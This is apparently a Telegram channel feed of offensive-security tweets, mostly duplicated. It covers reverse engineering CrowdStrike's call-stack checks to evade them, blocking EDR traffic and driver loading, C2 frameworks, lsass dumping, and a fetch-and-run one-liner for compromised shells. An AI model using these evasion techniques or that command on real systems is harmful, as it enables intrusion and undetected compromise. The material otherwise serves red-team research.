😈 [ Chetan Nayak (Brute Ratel C4 Author) @NinjaParanoid ]
Got a question from a BruteRatel operator in the BRC4 discord channel as to what the newly implemented csxumd64_xxxxx.dll module in Crowdstrike does. So, heres my little explanation post reversing it.
Crowdstrike implants 3 DLLs in their latest version - umppcxxxxx.dll, csxumd64_xxxxx.dll and umpdc.dll. UMPPC is the main usermode DLL which hooks into various NTAPI. UMPDC is more focused towards ADDC related attacks. Maybe another tweet on this later. But the CSXUMD64 (or Extended User Mode Data Module as CS likes to call it) is mainly responsible for analyzing the call stacks of various API calls, as well as a few new thread pool hooks such as CreateThreadPoolWork, maybe to check for loaded libraries or similar. The callstacks are analyzed only when a certain set of conditions are hit. Heres a walkthrough of the Callstack which I've lablelled and explained:
Image 1: Hooked API call (CreateThreadPoolWork in combase.dll) jumps to csxumd64
Image 2: csxumd64 saves the registers to stack before calling RtlAddVectoredExceptionHandler. This API call enables VEH hooking for an internal function of csxumd64 (rdx register)
Image 3: VEH function checks a few arguments and if the profile fits, it will jump to another internal function
Image 4: This function calls RtlCaptureContext to get register and stack information about the thread which call the Hooked API call in Image 1 (CreateThreadPoolWork), Now here...
a. RtlCaptureContext returns a pointer to a CONTEXT structer which has the current thread metadata required to walk the stack.
b. The return address captured from the CONTEXT structure is passed on to RtlLookupFunctionEntry which returns a pointer to RUNTIME_FUNCTION structure containing the unwind data for the stack.
c. This unwind data is then verified against the output from API RtlVirtualUnwind to check if the callstack is being backed to disk. If this is not backed, VEH is removed and the process is killed using ZwTerminateProcess API.
Crowdstrike mentions in their documentation that this module captures additional data, but can incur greater performance penalities, which does make sense, as VEH and stack tracing can seriously affect process performance when done on a large scale. However, what is extremely dumb here is, that they are not performing ETWTI stack tracing from the Kernel like ATP/Elastic or FortiEDR to avoid being simply unhooked from the userland. Wondering if I should release the tool to simply undo all the hooks that CS has placed, or just let it play out. :D
Theres a lot more that happens within these three DLLs which I've incorporated in my v1.8 release for BRC4, and will also be discussing about some of them in the January 2024 Malware On Steroids workshop.
🐥 [ tweet ]
Got a question from a BruteRatel operator in the BRC4 discord channel as to what the newly implemented csxumd64_xxxxx.dll module in Crowdstrike does. So, heres my little explanation post reversing it.
Crowdstrike implants 3 DLLs in their latest version - umppcxxxxx.dll, csxumd64_xxxxx.dll and umpdc.dll. UMPPC is the main usermode DLL which hooks into various NTAPI. UMPDC is more focused towards ADDC related attacks. Maybe another tweet on this later. But the CSXUMD64 (or Extended User Mode Data Module as CS likes to call it) is mainly responsible for analyzing the call stacks of various API calls, as well as a few new thread pool hooks such as CreateThreadPoolWork, maybe to check for loaded libraries or similar. The callstacks are analyzed only when a certain set of conditions are hit. Heres a walkthrough of the Callstack which I've lablelled and explained:
Image 1: Hooked API call (CreateThreadPoolWork in combase.dll) jumps to csxumd64
Image 2: csxumd64 saves the registers to stack before calling RtlAddVectoredExceptionHandler. This API call enables VEH hooking for an internal function of csxumd64 (rdx register)
Image 3: VEH function checks a few arguments and if the profile fits, it will jump to another internal function
Image 4: This function calls RtlCaptureContext to get register and stack information about the thread which call the Hooked API call in Image 1 (CreateThreadPoolWork), Now here...
a. RtlCaptureContext returns a pointer to a CONTEXT structer which has the current thread metadata required to walk the stack.
b. The return address captured from the CONTEXT structure is passed on to RtlLookupFunctionEntry which returns a pointer to RUNTIME_FUNCTION structure containing the unwind data for the stack.
c. This unwind data is then verified against the output from API RtlVirtualUnwind to check if the callstack is being backed to disk. If this is not backed, VEH is removed and the process is killed using ZwTerminateProcess API.
Crowdstrike mentions in their documentation that this module captures additional data, but can incur greater performance penalities, which does make sense, as VEH and stack tracing can seriously affect process performance when done on a large scale. However, what is extremely dumb here is, that they are not performing ETWTI stack tracing from the Kernel like ATP/Elastic or FortiEDR to avoid being simply unhooked from the userland. Wondering if I should release the tool to simply undo all the hooks that CS has placed, or just let it play out. :D
Theres a lot more that happens within these three DLLs which I've incorporated in my v1.8 release for BRC4, and will also be discussing about some of them in the January 2024 Malware On Steroids workshop.
🐥 [ tweet ]
🔥7👍6
😈 [ Chetan Nayak (Brute Ratel C4 Author) @NinjaParanoid ]
Now that cats out of the bag, Let me state that I've been exploiting the last part (IE Proxy modification) in my last few Red team engagements to deploy a local proxy via BOF which blocks all Crowdstrike traffic and only allows only the ones I've whitelisted 😛. Heres a quick snapshot to identify Crowdstrike traffic (cloudsink.net) via local socks proxy 🫢. Might post its BOF later, unless someone beats me to it.
🐥 [ tweet ]
Комментарий относительно этого разбора бсода от 360
Now that cats out of the bag, Let me state that I've been exploiting the last part (IE Proxy modification) in my last few Red team engagements to deploy a local proxy via BOF which blocks all Crowdstrike traffic and only allows only the ones I've whitelisted 😛. Heres a quick snapshot to identify Crowdstrike traffic (cloudsink.net) via local socks proxy 🫢. Might post its BOF later, unless someone beats me to it.
🐥 [ tweet ]
Комментарий относительно этого разбора бсода от 360
👍6🔥1
😈 [ SpecterOps @SpecterOps ]
Do you like BloodHound & PowerShell? Do you want to automate all things BloodHound?
Check out @SadProcessor's new blog post diving into a new PowerShell module he created, & instructions on how to get started ⤵️
🔗 https://posts.specterops.io/bloodhound-operator-dog-whispering-reloaded-156020b7c5e9
🔗 https://github.com/SadProcessor/BloodHoundOperator
🐥 [ tweet ]
Do you like BloodHound & PowerShell? Do you want to automate all things BloodHound?
Check out @SadProcessor's new blog post diving into a new PowerShell module he created, & instructions on how to get started ⤵️
🔗 https://posts.specterops.io/bloodhound-operator-dog-whispering-reloaded-156020b7c5e9
🔗 https://github.com/SadProcessor/BloodHoundOperator
🐥 [ tweet ]
🔥3🥱2
😈 [ Cube0x0 @cube0x0 ]
Over a year ago, I left my position at WithSecure to start a new journey, create something new, and do my own thing. Today, I'm excited to publicly announce what I've been working on all this time.
Introducing 0xC2, a cross-platform C2 framework targeting Windows, Linux, and MacOS environments:
🔗 https://0xc2.io
The first release was back in late 2023, initially only offered to a small circle of red teamers and soon, the registration will be open for new clients who provide threat simulation services.
All agents are written as PIC in C to provide better opsec and to allow operators to be more flexible when designing payloads. To make the agents modular and fully customizable, operators can create a user-defined virtual table that can be hooked by the agent. This can be used to change the default behavior of an agent or extend capabilities, from adding internal commands to implementing P2P protocols.
More details will be available soon.
🐥 [ tweet ]
Over a year ago, I left my position at WithSecure to start a new journey, create something new, and do my own thing. Today, I'm excited to publicly announce what I've been working on all this time.
Introducing 0xC2, a cross-platform C2 framework targeting Windows, Linux, and MacOS environments:
🔗 https://0xc2.io
The first release was back in late 2023, initially only offered to a small circle of red teamers and soon, the registration will be open for new clients who provide threat simulation services.
All agents are written as PIC in C to provide better opsec and to allow operators to be more flexible when designing payloads. To make the agents modular and fully customizable, operators can create a user-defined virtual table that can be hooked by the agent. This can be used to change the default behavior of an agent or extend capabilities, from adding internal commands to implementing P2P protocols.
More details will be available soon.
🐥 [ tweet ]
👍9🔥1
Forwarded from Блог Kaimi & d_x
Эксплуатация состояния гонки в «тапалках» в Telegram
https://kaimi.io/2024/08/exploit-race-condition-in-telegram-mini-apps/
https://kaimi.io/2024/08/exploit-race-condition-in-telegram-mini-apps/
Misc
Эксплуатация состояния гонки в «тапалках» в Telegram - Misc
Эксплуатация состояния гонки (race condition) в ‘тапалках’ в Telegram Mini Apps (Blum, CalmMe и других)
🔥4🥱1
😈 [ Nic Losby @ DEFCON @Blurbdust ]
And a small update, generation is over halfway and will actually finish! A release of a torrent should be out before the end of the year!
🐥 [ tweet ][ reply ]
(про те самые радужные таблицы crack.sh 🏳️🌈)
And a small update, generation is over halfway and will actually finish! A release of a torrent should be out before the end of the year!
🐥 [ tweet ][ reply ]
(про те самые радужные таблицы crack.sh 🏳️🌈)
👍5🤯3
😈 [ Michael Schwarz @misc0110 ]
With the #GhostWrite CPU vulnerability, all isolation boundaries are broken - sandbox/container/VM can't prevent GhostWrite from writing and reading arbitrary physical memory on affected RISC-V CPUs. Deterministic, fast, and reliable - no side channels.
🔗 https://ghostwriteattack.com/
🐥 [ tweet ]
With the #GhostWrite CPU vulnerability, all isolation boundaries are broken - sandbox/container/VM can't prevent GhostWrite from writing and reading arbitrary physical memory on affected RISC-V CPUs. Deterministic, fast, and reliable - no side channels.
🔗 https://ghostwriteattack.com/
🐥 [ tweet ]
😢4
😈 [ CCob🏴 @_EthicalChaos_ ]
Thanks to @_dirkjan for agreeing to share the stage with me for our talk on Windows Hello abuse. I have now made the repo public for those who want to have a play around with Shwmae. I promise, I'll get a README for it next week 🙈
🔗 https://github.com/CCob/Shwmae
🐥 [ tweet ]
Thanks to @_dirkjan for agreeing to share the stage with me for our talk on Windows Hello abuse. I have now made the repo public for those who want to have a play around with Shwmae. I promise, I'll get a README for it next week 🙈
🔗 https://github.com/CCob/Shwmae
🐥 [ tweet ]
🔥6
😈 [ Orange Tsai 🍊 @orange_8361 ]
Thrilled to release my latest research on Apache HTTP Server, revealing several architectural issues!
Highlights include:
⚡ Escaping from DocumentRoot to System Root
⚡ Bypassing built-in ACL/Auth with just a '?'
⚡ Turning XSS into RCE with legacy code
🔗 https://blog.orange.tw/2024/08/confusion-attacks-en.html
🐥 [ tweet ]
Thrilled to release my latest research on Apache HTTP Server, revealing several architectural issues!
Highlights include:
⚡ Escaping from DocumentRoot to System Root
⚡ Bypassing built-in ACL/Auth with just a '?'
⚡ Turning XSS into RCE with legacy code
🔗 https://blog.orange.tw/2024/08/confusion-attacks-en.html
🐥 [ tweet ]
👍8🥱6🔥4🤔1
😈 [ Ricardo Ruiz @RicardoJoseRF ]
Last week I made public TrickDump, a tool to dump lsass using only NTAPIS without creating a Minidump file, generating instead 3 JSON and 1 ZIP file with the memory region dumps. Check it out here:
🔗 https://github.com/ricardojoserf/TrickDump
🐥 [ tweet ]
Last week I made public TrickDump, a tool to dump lsass using only NTAPIS without creating a Minidump file, generating instead 3 JSON and 1 ZIP file with the memory region dumps. Check it out here:
🔗 https://github.com/ricardojoserf/TrickDump
🐥 [ tweet ]
🔥9🥱3
😈 [ OtterHacker @OtterHacker ]
I've published my #defcon32 workshop!
If you want to develop your own "Perfect DLL Loader", you will have all you need in it. From the classic minimal loader to a fully featured one, this workshop in 6 steps is a journey inside the Windows internals!
🔗 https://github.com/OtterHacker/Conferences/tree/main/Defcon32
🐥 [ tweet ]
I've published my #defcon32 workshop!
If you want to develop your own "Perfect DLL Loader", you will have all you need in it. From the classic minimal loader to a fully featured one, this workshop in 6 steps is a journey inside the Windows internals!
🔗 https://github.com/OtterHacker/Conferences/tree/main/Defcon32
🐥 [ tweet ]
🔥7👍2🥱1
😈 [ Bad Sector Labs @badsectorlabs ]
Dropped a new tool at DEF CON 32! Loot SCCM Distribution points via HTTP with
We've found credentials, certificates, custom apps, keystores, etc. What will you find?
🔗 https://github.com/badsectorlabs/sccm-http-looter
🐥 [ tweet ]
Dropped a new tool at DEF CON 32! Loot SCCM Distribution points via HTTP with
We've found credentials, certificates, custom apps, keystores, etc. What will you find?
🔗 https://github.com/badsectorlabs/sccm-http-looter
🐥 [ tweet ]
🔥6
😈 [ klez @KlezVirus ]
[RELEASE] Following the talk at DEF CON, I'm releasing all the POC projects associated with DriverJack. More info in the repos. For any additional info, hit me up ;)
🔗 https://github.com/klezVirus/DriverJack
🔗 https://github.com/klezVirus/RpcProxyInvoke
🔗 https://github.com/klezVirus/koppeling-p
🐥 [ tweet ]
[RELEASE] Following the talk at DEF CON, I'm releasing all the POC projects associated with DriverJack. More info in the repos. For any additional info, hit me up ;)
🔗 https://github.com/klezVirus/DriverJack
🔗 https://github.com/klezVirus/RpcProxyInvoke
🔗 https://github.com/klezVirus/koppeling-p
🐥 [ tweet ]
👍7🔥2
😈 [ Dirk-jan @_dirkjan ]
At Def Con I presented with @_EthicalChaos_ on new Windows Hello attacks. For ex: how to use the WinHello crypto keys from a low priv session to request a PRT on a different device, bypassing TPM protection of PRTs.
Slides:
🔗 https://dirkjanm.io/talks/
PoC:
🔗 https://github.com/dirkjanm/ROADtools/tree/master/winhello_assertion
🐥 [ tweet ]
At Def Con I presented with @_EthicalChaos_ on new Windows Hello attacks. For ex: how to use the WinHello crypto keys from a low priv session to request a PRT on a different device, bypassing TPM protection of PRTs.
Slides:
🔗 https://dirkjanm.io/talks/
PoC:
🔗 https://github.com/dirkjanm/ROADtools/tree/master/winhello_assertion
🐥 [ tweet ]
🔥3
😈 [ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ]
RELEASE:
This should be the 1st command you execute on a remote shell 🧨
Makes the BASH hack-ready. Lots of neat commands + apt-like static binary download ('bin nmap', ...).
LEAVES NO TRACE (memory only).
🔗 https://github.com/hackerschoice/hackshell
🐥 [ tweet ]
RELEASE:
This should be the 1st command you execute on a remote shell 🧨
source <(curl -SsfL https://thc.org/hs)
Makes the BASH hack-ready. Lots of neat commands + apt-like static binary download ('bin nmap', ...).
LEAVES NO TRACE (memory only).
🔗 https://github.com/hackerschoice/hackshell
🐥 [ tweet ]
👍15🔥4
Offensive Xwitter
😈 [ Daniel @0x64616e ] Lol, blocking the loading of EDR drivers with WDAC actually works. 🐥 [ tweet ][ quote ]
😈 [ Yarden Shafir @yarden_shafir ]
Another method that still works on most EDRs is HVCIDisallowedImages reg key that blocks drivers by filename.
Can take multiple filenames, but requires HVCI to be enabled + reboot.
🐥 [ tweet ][ quote ]
Another method that still works on most EDRs is HVCIDisallowedImages reg key that blocks drivers by filename.
Can take multiple filenames, but requires HVCI to be enabled + reboot.
🐥 [ tweet ][ quote ]
👍13